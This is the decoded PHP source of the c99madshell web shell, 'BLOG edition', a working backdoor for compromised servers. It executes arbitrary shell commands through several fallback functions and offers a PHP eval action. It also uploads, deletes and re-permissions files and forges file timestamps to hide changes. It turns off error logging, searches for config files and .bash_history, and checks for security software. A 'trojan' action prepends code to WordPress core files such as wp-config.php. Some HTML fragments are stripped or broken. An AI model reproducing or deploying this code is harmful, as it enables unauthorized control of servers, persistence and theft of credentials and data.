/* Decoded by unphp.net */ ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); //@ignore_user_abort(TRUE); @set_time_limit(0); @set_magic_quotes_runtime(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); $ip = $_SERVER['REMOTE_ADDR']; $allow_ext = array('mysql','mysqli','ftp','curl','imap','sockets','mssql','sqlite'); $allow_program = array('gcc','cc','ld','php','perl','python','ruby','make','tar','nc','locate','suidperl','wget','get','fetch','links','lynx','curl','lwp-mirror','lwp-download'); $allow_service = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','tripwire','sxid','logcheck','logwatch'); @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode,$ft; $v = @ob_get_contents(); @ob_end_clean(); @ob_start("ob_gzHandler"); echo $v; @ob_end_flush(); } function which($which) { $locate = myshellexec('which '.$which); if($locate) { return $locate; } else { return false; } } function save_file($file, $content) { global $win; if(!file_exists($file)) { return false; } clearstatcache(); $filetime = filemtime($file); if(!is_writable($file)) { $fileperm = substr(decoct(fileperms($file)), -4, 4); @chmod($file, intval(0777,8)); if(!is_writable($file)) { return false; } } $handle = @fopen($file, 'w'); if($handle === FALSE) { return false; } fwrite($handle, $content); fclose($handle); @touch($file, $filetime, $filetime); if(isset($fileperm) && !empty($fileperm)) { @chmod($file, intval($fileperm,8)); } clearstatcache(); return true; } function c99shexit() { onphpshutdown(); exit; } function RecursFile($dir) { $files = array(); if(substr($dir, -1) != DIRECTORY_SEPARATOR) { $dir .= DIRECTORY_SEPARATOR; } if(!file_exists($dir)) { return false; } clearstatcache(); // ×èñòèì êåø $realpath = getcwd(); // Ñîõðàíÿåì òåêóùèé ïóòü $handle = @opendir($dir); if(FALSE === $handle) { return false; } chdir($dir); while(FALSE !== ($file = readdir($handle))) { if('.' != $file && '..' != $file ) { if(is_dir($file)) { $recurs = RecursFile($dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR); if(is_array($recurs)) { $files = array_merge($files, $recurs); } } elseif(is_file($file)) { $files[] = str_replace(array('\', '//'), DIRECTORY_SEPARATOR, $dir.DIRECTORY_SEPARATOR.$file); } } } closedir($handle); chdir($realpath); // Âîññòàíàâëèâàåì ïóòü clearstatcache(); // ×èñòèì êåø //sort($files); return $files; } /** * Ôóíêöèÿ ïîêàçûâàåò ðåêóðñèâíî âñå ïàïêè èç çàäàííîé. * */ function RecursDir($dir) { $dirs = array(); if(substr($dir, -1) != DIRECTORY_SEPARATOR) { $dir .= DIRECTORY_SEPARATOR; } if(!file_exists($dir)) { return false; } clearstatcache(); // ×èñòèì êåø $realpath = getcwd(); // Ñîõðàíÿåì òåêóùèé ïóòü $handle = @opendir($dir); if(FALSE === $handle) { return false; } chdir($dir); $dirs[] = str_replace(array('\', '//'), DIRECTORY_SEPARATOR, $dir); while(FALSE !== ($file = readdir($handle))) { if('.' != $file && '..' != $file ) { if(is_dir($file)) { $dirs[] = str_replace(array('\', '//'), DIRECTORY_SEPARATOR, $dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR); $recurs = RecursDir($dir.DIRECTORY_SEPARATOR.$file.DIRECTORY_SEPARATOR); if(is_array($recurs)) { $dirs = array_merge($dirs, $recurs); } } } } closedir($handle); chdir($realpath); // Âîññòàíàâëèâàåì ïóòü clearstatcache(); // ×èñòèì êåø $dirs = array_unique($dirs); return $dirs; } function setRecursPerm($dir, $perm) { $good = 0; $bad = 0; $all = array_merge(RecursFile($dir), RecursDir($dir)); foreach($all as $file) { if(@chmod($file, $perm)) { $good++; } else { $bad++; } } return $good.':'.$bad; } $win = strtolower(substr(PHP_OS,0,3)) == "win"; if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} $shver = "3.0 BLOG edition"; if (empty($surl)){ $surl = $_SERVER['PHP_SELF']; } $surl = htmlspecialchars($surl); $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./"; $sort_default = "0a"; $sort_save = TRUE; $safemode_diskettes = array('a'); $hexdump_lines = 8; $hexdump_rows = 24; $nixpwdperpage = 100; if (!$win) { $cmdaliases = array( array("-----------------------------------------------------------", "ls -la"), array("find config.inc.php files", "find / -type f -name config.inc.php"), array("find config* files", "find / -type f -name \"config*\""), array("find config* files in current dir", "find . -type f -name \"config*\""), array("find all writable folders and files", "find / -perm -2 -ls"), array("find all writable folders and files in current dir", "find . -perm -2 -ls"), array("find all .bash_history files", "find / -type f -name .bash_history"), array("find .bash_history files in current dir", "find . -type f -name .bash_history"), array("show opened ports", "netstat -an | grep -i listen") ); } else { $cmdaliases = array( array("-----------------------------------------------------------", "dir"), array("show opened ports", "netstat -an") ); } $quicklaunch = array( array("
Search","#\" onclick=\"document.todo.act.value='search';document.todo.d.value='%d';document.todo.submit();"), array("PHP-code","#\" onclick=\"document.todo.act.value='eval';document.todo.d.value='%d';document.todo.submit();"), array("Self remove","#\" onclick=\"document.todo.act.value='selfremove';document.todo.submit();"), ); $highlight_background = "#c0c0c0"; $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; $highlight_string = "#000000"; @$f = $_REQUEST["f"]; @extract($_REQUEST["c99shcook"]); if (isset($_POST['act'])) $act = $_POST['act']; if (isset($_POST['d'])) $d = urldecode($_POST['d']); else $d=getcwd(); if (isset($_POST['sort'])) $sort = $_POST['sort']; if (isset($_POST['f'])) $f = urldecode($_POST['f']); if (isset($_POST['ft'])) $ft = $_POST['ft']; if (isset($_POST['grep'])) $grep = $_POST['grep']; if (isset($_POST['processes_sort'])) $processes_sort = $_POST['processes_sort']; if (isset($_POST['pid'])) $pid = $_POST['pid']; if (isset($_POST['sig'])) $sig = $_POST['sig']; if (isset($_POST['base64'])) $base64 = $_POST['base64']; if (isset($_POST['fullhexdump'])) $fullhexdump = $_POST['fullhexdump']; if (isset($_POST['c'])) $c = $_POST['c']; if (isset($_POST['white'])) $white = $_POST['white']; if (isset($_POST['nixpasswd'])) $nixpasswd = $_POST['nixpasswd']; $lastdir = @realpath("."); @chdir($curdir); $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); } else { $disablefunc = array(); } function str2mini($content,$len) { if (strlen($content) > $len) { $len = ceil($len/2) - 2; return substr($content, 0,$len)."...".substr($content,-$len); } else {return $content;} } function listdir($start_dir='.') { $files = array(); if (is_dir($start_dir)) { $fh = opendir($start_dir); while (($file = readdir($fh)) !== false) { # loop through the files, skipping . and .., and recursing if necessary if (strcmp($file, '.')==0 || strcmp($file, '..')==0) continue; $filepath = $start_dir . '/' . $file; if ( is_dir($filepath) ) $files = array_merge($files, listdir($filepath)); else array_push($files, $filepath); } closedir($fh); } else { # false if the function was called with an invalid non-directory argument $files = false; } return $files; } function view_size($size) { if (!is_numeric($size)) {return FALSE;} else { if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} else {$size = $size . " B";} return $size; } } function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d); } function fs_rmobj($o) { $o = str_replace("\",DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return FALSE;} } function myshellexec($cfe) { $res = ''; if (!empty($cfe)) { if(@function_exists('exec')) { @exec($cfe,$res); $res = join(" ",$res); } elseif(@function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(@function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; if(@function_exists('fread') && @function_exists('feof')){ while(!@feof($f)) { $res .= @fread($f,1024); } }else if(@function_exists('fgets') && @function_exists('feof')){ while(!@feof($f)) { $res .= @fgets($f,1024); } } @pclose($f); } elseif(@is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes))) { $res = ""; if(@function_exists('fread') && @function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);} }else if(@function_exists('fgets') && @function_exists('feof')){ while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);} } @proc_close($f); } elseif(@function_exists('pcntl_exec')&&@function_exists('pcntl_fork')) { $res = '[~] Blind Command Execution via [pcntl_exec] '; $pid = @pcntl_fork(); if ($pid == -1) { $res .= '[-] Could not children fork. c99shexit'; } else if ($pid) { if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';} else {$res .= '[-] Error. Command incorrect.';} } else { $cfe = array(" -e 'system(\"$cfe\")'"); if(@pcntl_exec('/usr/bin/perl',$cfe)) c99shexit(0); if(@pcntl_exec('/usr/local/bin/perl',$cfe)) c99shexit(0); die(); } } } return $res; } function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]); } function view_perms($mode) { if (($mode & 0xC000) === 0xC000) {$type = "s";} elseif (($mode & 0x4000) === 0x4000) {$type = "d";} elseif (($mode & 0xA000) === 0xA000) {$type = "l";} elseif (($mode & 0x8000) === 0x8000) {$type = "-";} elseif (($mode & 0x6000) === 0x6000) {$type = "b";} elseif (($mode & 0x2000) === 0x2000) {$type = "c";} elseif (($mode & 0x1000) === 0x1000) {$type = "p";} else {$type = "?";} $owner["read"] = ($mode & 00400)?"r":"-"; $owner["write"] = ($mode & 00200)?"w":"-"; $owner["execute"] = ($mode & 00100)?"x":"-"; $group["read"] = ($mode & 00040)?"r":"-"; $group["write"] = ($mode & 00020)?"w":"-"; $group["execute"] = ($mode & 00010)?"x":"-"; $world["read"] = ($mode & 00004)?"r":"-"; $world["write"] = ($mode & 00002)? "w":"-"; $world["execute"] = ($mode & 00001)?"x":"-"; if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} return $type.join("",$owner).join("",$group).join("",$world); } if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} if (!function_exists("parse_perms")) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) {$t = "s";} elseif (($mode & 0x4000) === 0x4000) {$t = "d";} elseif (($mode & 0xA000) === 0xA000) {$t = "l";} elseif (($mode & 0x8000) === 0x8000) {$t = "-";} elseif (($mode & 0x6000) === 0x6000) {$t = "b";} elseif (($mode & 0x2000) === 0x2000) {$t = "c";} elseif (($mode & 0x1000) === 0x1000) {$t = "p";} else {$t = "?";} $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); } } function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != "d") {$second = "a";} return array($one,$second); } function view_perms_color($o) { if (!@is_readable($o)) {return "".view_perms(@fileperms($o))."";} elseif (!@is_writable($o)) {return "".view_perms(@fileperms($o))."";} else {return "".view_perms(@fileperms($o))."";} } function c99fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($f = readdir($h)) !== FALSE) { if($f != "." && $f != "..") { $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); if (is_dir($d.$f)) { $search_i_d++; if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} if (!is_link($d.$f)) {c99fsearch($d.$f);} } else { $search_i_f++; if ($bool) { if (!empty($a["text"])) { $r = @file_get_contents($d.$f); if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} else {$bool = strpos(" ".$r,$a["text"],1);} if ($a["text_not"]) {$bool = !$bool;} if ($bool) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($h); } if(!isset($act)) {$act='';} if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", FALSE); header("Pragma: no-cache"); if (empty($tmpdir)) { $tmpdir = ini_get("upload_tmp_dir"); if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} } $tmpdir = realpath($tmpdir); $tmpdir = str_replace("\",DIRECTORY_SEPARATOR,$tmpdir); if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} else {$tmpdir_logs = realpath($tmpdir_logs);} if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = TRUE; $hsafemode = "ON (secure)"; } else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} $sort = @htmlspecialchars($sort); if (empty($sort)) {$sort = $sort_default;} $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),'',getenv("SERVER_SOFTWARE")); @ini_set("highlight.bg",$highlight_bg); //FFFFFF @ini_set("highlight.comment",$highlight_comment); //#FF8000 @ini_set("highlight.default",$highlight_default); //#0000BB @ini_set("highlight.html",$highlight_html); //#000000 @ini_set("highlight.keyword",$highlight_keyword); //#007700 @ini_set("highlight.string",$highlight_string); //#DD0000 if (!isset($actbox) || !is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?><?php echo getenv("HTTP_HOST"); ?> - c99madshell

!C99madShell v. !

Software:  

System:  

User/Group: '); $groupinfo = posix_getgrgid(posix_getegid()); echo(get_current_user().'/'.$groupinfo['name']); echo(' 

'); } ?>

Php version:

Php modules:  '); $intersect = array_intersect($allow_ext, $cur_ext); echo(implode(', ', $intersect)); ?>  

Disable functions: '.implode(', ', $disablefunc).'

'); } if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) { echo('

Mod Security: YES

'); } if(!$win && $safemode === FALSE) { $pro = array(); $ser = array(); foreach($allow_program as $program) { if($locate = which($program)) { $pro[] = ''.$program.''; } } foreach($allow_service as $service) { if($locate = which($service)) { $ser[] = ''.$service.''; } } if($pro) { echo('

Install program: '.implode(', ', $pro).'

'); } if($ser) { echo('

Install service: '.implode(', ', $ser).'

'); } } ?>

Allow_url_fopen: ON':'OFF'); ?>

Allow_url_include: ON':'OFF'); ?>

Safe-mode: 

Wordpress Not Found! '); echo('

'); } function draw_trojan() { echo('

Trojan:

'); } function draw_patch() { echo('

Patch:

'); } function found_wp() { $path = @getcwd(); if($path === false) { return false; } if(valid_wp_path($path)) { return $path; } if(preg_match('%(wp-(\w+))%i', $path, $ret)) { $path = substr($path, 0, strpos($path, $ret[0])); return $path; } if(preg_match('%(blog|wp|wordpress|blogs)%i', $path, $ret)) { $path = substr($path, 0, strpos($path, $ret[0])+strlen($ret[0])+1); return $path; } return false; } function valid_wp_path($path) { if($path === false) { return false; } if(file_exists($path.'wp-config.php')) { return true; } else { return false; } } function get_style($vuln) { global $wp_path; switch($vuln) { case 'xmlrpc1': case 'xmlrpc2': $file = $wp_path.'xmlrpc.php'; break; case 'admin_ajax': $file = file_exists($wp_path.'wp-includes/pluggable.php')?$wp_path.'wp-includes/pluggable.php':$wp_path.'wp-includes/pluggable-functions.php'; break; case 'blog_name_sql': $file = $wp_path.'wp-trackback.php'; break; case 'tb_id': $file = $wp_path.'wp-trackback.php'; break; case 'index': $file = $wp_path.'index.php'; break; case 'wp-blog-header': $file = $wp_path.'wp-blog-header.php'; break; case 'wp-config': $file = $wp_path.'wp-config.php'; break; case 'wp-settings': $file = $wp_path.'wp-settings.php'; break; case 'template-loader': $file = $wp_path.'wp-includes/template-loader.php'; break; case 'template': $file = $wp_path.'wp-trackback.ph'; break; default: return false; } if(!is_writable($file) && is_patching($vuln, $file)) { $style = 'background-color: yellow; color: black" disabled'; } elseif(is_writable($file) && is_patching($vuln, $file)) { $style = 'background-color: yellow; color: black" disabled'; } elseif(is_writable($file) && !is_patching($vuln, $file)) { $style = 'background-color: green; color: white"'; } else { $style = 'background-color: #800000; color: #FFFFFF" disabled'; } return $style; } function is_patching($vuln, $file) { if($vuln == 'index' || $vuln == 'wp-blog-header' || $vuln == 'wp-config' || $vuln == 'wp-settings' || $vuln == 'template-loader' || $vuln == 'template') { $content = @implode('', @file($file)); if(!$content) { return false; } if(strpos($content, 'flag_turcie') !== FALSE) { return true; } else { return false; } } elseif($vuln == 'xmlrpc1') { $content = @implode('', @file($file)); if(!$content) { return false; } if(strpos($content, '//\'pingback.ping\' => \'this:pingback_ping\',') !== FALSE) { return true; } else { return false; } } elseif($vuln == 'xmlrpc2') { $content = @implode('', @file($file)); if(!$content) { return false; } if(strpos($content, '//\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',') !== FALSE) { return true; } else { return false; } } elseif($vuln == 'admin_ajax') { $content = @implode('', @file($file)); if(!$content) { return false; } if(strpos($content, '$user_login = $wpdb->escape($user_login);') !== FALSE) { return true; } else { return false; } } elseif($vuln == 'blog_name_sql') { $content = @implode('', @file($file)); if(!$content) { return false; } if(strpos($content, '$blog_name = $wpdb->escape($blog_name);') !== FALSE) { return true; } else { return false; } } elseif($vuln == 'tb_id') { $content = @implode('', @file($file)); if(!$content) { return false; } if(strpos($content, '$tb_id = intval($tb_id);') !== FALSE) { return true; } else { return false; } } } ?>

".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; $i++; } echo "   "; if (@is_writable($d)) { $wd = TRUE; $wdt = "[ ok ]"; echo "".view_perms(@fileperms($d)).""; } else { $wd = FALSE; $wdt = "[ Read-Only ]"; echo "".view_perms_color($d).""; } echo "
"; $letters = ""; if ($win) { $v = explode("\",$d); $v = $v[0]; foreach (range("a","z") as $letter) { $bool = $isdiskette = in_array($letter,$safemode_diskettes); if (!$bool) {$bool = @is_dir($letter.":\");} if ($bool) { $letters .= "[ "; if (strtolower($letter.':') != strtolower($v)) {$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] "; } } if (!empty($letters)) {echo "Detected drives: ".$letters."
";} } if (count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%sort",$sort,$item[1]); $v = @realpath($d.".."); if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} $item[1] = str_replace("%upd",urlencode($v),$item[1]); echo "".$item[0]."    "; } } echo "


"; if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
".$donated_html."

";} echo "
"; if ($act == "") {$act = $dspact = "ls";} if($act == 'patch') { $vuln = $wp_act; if($vuln == 'xmlrpc1') { $content = @implode('', @file($wp_path.'xmlrpc.php')); $content = str_replace('\'pingback.ping\' => \'this:pingback_ping\',', '//\'pingback.ping\' => \'this:pingback_ping\',', $content); $result = save_file($wp_path.'xmlrpc.php', $content); } elseif($vuln == 'xmlrpc2') { $content = @implode('', @file($wp_path.'xmlrpc.php')); $content = str_replace('\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',', '//\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',', $content); $result = save_file($wp_path.'xmlrpc.php', $content); } elseif($vuln == 'admin_ajax') { if(file_exists($wp_path.'wp-includes/pluggable.php')) { $content = @implode('', @file($wp_path.'wp-includes/pluggable.php')); $content = str_replace('$user_login = sanitize_user( $user_login );', '$user_login = sanitize_user( $user_login );'." ".'$user_login = $wpdb->escape($user_login); ', $content); $result = save_file($wp_path.'wp-includes/pluggable.php', $content); } if(file_exists($wp_path.'wp-includes/pluggable-functions.php')) { $content = @implode('', @file($wp_path.'wp-includes/pluggable-functions.php')); $content = str_replace('$user_login = sanitize_user( $user_login );', '$user_login = sanitize_user( $user_login );'." ".'$user_login = $wpdb->escape($user_login); ', $content); $result = save_file($wp_path.'wp-includes/pluggable-functions.php', $content); } } elseif($vuln == 'blog_name_sql') { $content = @implode('', @file($wp_path.'wp-trackback.php')); $content = str_replace('if ( is_single() || is_page() )', '$blog_name = $wpdb->escape($blog_name);'." ".'if ( is_single() || is_page() )', $content); $result = save_file($wp_path.'wp-trackback.php', $content); } elseif($vuln == 'tb_id') { $content = @implode('', @file($wp_path.'wp-trackback.php')); preg_match('%\$tb_url(\s+)= \$_POST\[\'url\'\];%i', $content, $ret); $content = str_replace('$tb_url'.$ret[1].'= $_POST[\'url\'];', '$tb_id = intval($tb_id); '." ".'$tb_url = $_POST[\'url\'];', $content); $result = save_file($wp_path.'wp-trackback.php', $content); } else { $result = false; } if(isset($result) && $result) { echo('
Patching OK!!!
'); echo(''); } else { echo('
Patching NO!!!
'); } $d = $wp_path; $act = 'ls'; } if($act =='trojan') { switch($wp_act) { case 'index': $file = $wp_path.'index.php'; break; case 'wp-blog-header': $file = $wp_path.'wp-blog-header.php'; break; case 'wp-config': $file = $wp_path.'wp-config.php'; break; case 'wp-settings': $file = $wp_path.'wp-settings.php'; break; case 'template-loader': $file = $wp_path.'wp-includes/template-loader.php'; break; //case 'template': $file = $wp_path.'wp-trackback.ph'; break; } $content = @implode('', @file($file)); if(@ini_get('allow_url_fopen')==1) { $trojan = ''." "; } else { $trojan = ''." "; } $content = $trojan.$content; $result = save_file($file, $content); if($result) { echo('
Trojaning OK!!!
'); echo(''); } else { echo('
Trojaning NO!!!
'); } $d = $wp_path; $act = 'ls'; } if ($act == "mkdir") { if ($mkdir != $d) { if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} echo "

"; } $act = $dspact = "ls"; } if ($act == "d") { if (!is_dir($d)) {echo "
Permision denied!
";} else { echo "Directory information:"; if (!$win) { echo "
Owner/Group "; $ow = posix_getpwuid(fileowner($d)); $gr = posix_getgrgid(filegroup($d)); $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); } echo "
Perms".view_perms_color($d)."
Create time ".date("d/m/Y H:i:s",filectime($d))."
Access time ".date("d/m/Y H:i:s",fileatime($d))."
MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

"; } } if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} if ($act == "mkfile") { if ($mkfile != $d) { if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} } else {$act = $dspact = "ls";} } if ($act == "selfremove") { if (($submit == $rndcode) and ($submit != "")) { if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); } else {echo "
Can't delete ".__FILE__."!
";} } else { if (!empty($rndcode)) {echo "Error: incorrect confimation!";} $rnd = rand(0,9).rand(0,9).rand(0,9); echo "
Self-remove: ".__FILE__."
Are you sure?
For confirmation, enter \"".$rnd."\" "; } } if($act == 'touch') { if(is_link($d.$f) || $f == '.' || $f == '..') { echo('ONLY FILE AND CATALOGS!!!'); $act = 'ls'; } else { if(!isset($submit)) { $time_array = explode(':',@date("d:m:Y:H:i:s",@filemtime($d.$f))); echo("
   
Current file's time: ".@date("d.m.Y H:i:s", filemtime($d.$f)).'
Set new date:  Month  Year  Hour  Minute  Second
'); $act = 'ls'; } else { $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds"; $datar = @strtotime($datar); if(@touch($d.$f,$datar,$datar)) { echo('
Time was been change successfull
'); } else { echo('
Time NOT changed!!!
'); } $act = 'ls'; } } } if ($act == "search") { echo "Search in file-system:
"; if (empty($search_in)) {$search_in = $d;} if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} if (empty($search_text_wwo)) {$search_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array ( "name"=>@$search_name, "name_regexp"=>@$search_name_regexp, "text"=>@$search_text, "text_regexp"=>@$search_text_regxp, "text_wwo"=>@$search_text_wwo, "text_cs"=>@$search_text_cs, "text_not"=>@$search_text_not ); $in = array_unique(explode(";",$search_in)); foreach($in as $v) {c99fsearch($v);} if (count($found) == 0) {echo "No files found!";} else { $ls_arr = $found; $disp_fullpath = TRUE; $act = "ls"; } } echo "
Search for (file/folder name):   - regexp
Search in (explode \";\"):

Text:


- regexp    - whole words only    - case sensitive    - find files NOT containing the text

"; } if ($act == "chmod") { $mode = fileperms($d.$f); if (!$mode) {echo "Change file-mode with error: can't get current value.";} else { $form = TRUE; if (isset($chmod_submit)) { if(empty($hand)) { $octet = '0'.base_convert((isset($chmod_o["r"])?1:0).(isset($chmod_o["w"])?1:0).(isset($chmod_o["x"])?1:0).(isset($chmod_g["r"])?1:0).(isset($chmod_g["w"])?1:0).(isset($chmod_g["x"])?1:0).(isset($chmod_w["r"])?1:0).(isset($chmod_w["w"])?1:0).(isset($chmod_w["x"])?1:0),2,8); } else { if(substr($hand,0,1)==0) { $octet = $hand; } else {$octet = '0'.$hand; } } if(!isset($recurs)) $recurs = 0; if(is_dir($d.$f) && $recurs== 1) { $result = setRecursPerm($d.$f,intval($octet,8)); list($good, $bad) = explode(':', $result); echo('Result: '.$good.'=> Success, '.$bad.'=>BAD
'); } else { if (@chmod($d.$f,intval($octet,8))) { clearstatcache(); $act = 'ls'; $form = FALSE; $err = ''; } else { $err = 'Can\'t chmod to '.$octet.'.'; } } } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
".(isset($err)?"Error: ".$err:"")."
Owner

 Read
 Write
eXecute		Group

 Read
 Write
eXecute		World

 Read
 Write
eXecute

"; if(is_dir($d.$f)) { echo " Use recursive
"; } echo "
"; } } } if ($act == "upload") { $uploadmess = ''; if(isset($_FILES['uploadfile']) && !empty($_FILES['uploadfile']['tmp_name'])) { $uploadpath = $d; $destin = $_FILES['uploadfile']["name"]; if (!move_uploaded_file($_FILES['uploadfile']['tmp_name'],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$_FILES['uploadfile']['name']." (can't copy \"".$_FILES['uploadfile']['tmp_name']."\" to \"".$uploadpath.$destin."\"!
";} else { $uploadmess = 'File success uploaded'; } } echo "
".$uploadmess."
"; $act = 'ls'; } if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = FALSE; $result = fs_rmobj($v); if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
";} } if (!empty($delerr)) {echo "Deleting with errors:
".$delerr;} $act = "ls"; } if ($act == "cmd") { @chdir($chdir); if (!empty($submit)) { echo "Result of execution this command:
"; $olddir = realpath("."); @chdir($d); $ret = myshellexec($cmd); $ret = convert_cyr_string($ret,"d","w"); if ($cmd_txt) { $rows = count(explode(" ",$ret))+1; if ($rows < 10) {$rows = 10;} echo "
"; } else {echo $ret."
";} @chdir($olddir); } else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} echo "


 Display in text-area 
